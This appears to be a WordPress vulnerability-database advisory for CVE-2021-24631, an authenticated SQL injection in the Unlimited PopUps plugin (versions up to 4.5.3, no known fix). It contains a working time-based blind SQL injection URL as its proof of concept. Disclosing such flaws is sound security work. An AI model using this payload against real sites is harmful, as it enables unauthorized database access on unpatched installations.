Unlimited PopUps <= 4.5.3 – Author+ SQL Injection | CVE 2021-24631 | Plugin Vulnerabilities

Description

The plugin does not sanitise or escape the did GET parameter before using it in a SQL statement, available to users as low as editor, leading to an authenticated SQL Injection

Proof of Concept

https://plugins.trac.wordpress.org/browser/unlimited-popups/trunk/popuplist.php#L16

https://example.com/wp-admin/admin.php?page=popup&info=del&did=1%20AND%20(SELECT%204420%20FROM%20(SELECT(SLEEP(5)))yVXX)

Affects Plugins

unlimited-popups

No known fix

References

CVE

URL

https://codevigilant.com/disclosure/2021/wp-plugin-unlimited-popups/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Shreya Pohekar of Codevigilant Project

Verified

Yes

WPVDB ID

9841176d-1d37-4636-9144-0ca42b6f3605

Timeline

Publicly Published

2021-10-07 (about 2 years ago)

Added

2021-10-07 (about 2 years ago)

Last Updated

2022-04-09 (about 2 years ago)

Other

Published

Title

Published

2014-08-01

Title

IndiaNIC Testimonial 2.2 - testimonial.php custom_query Parameter SQL Injection

Published

2021-06-29

Title

FAQ Builder < 1.3.6 - Authenticated Blind SQL Injections

Published

2021-03-26

Title

Quiz And Survey Master < 7.1.14 - Authenticated SQL injection via Rest API

Published

2022-04-28

Title

Hermit <= 3.1.6 - Unauthenticated SQLi

Published

2023-10-29

Title

Google Maps made Simple <= 0.6 - Subscriber+ SQL Injection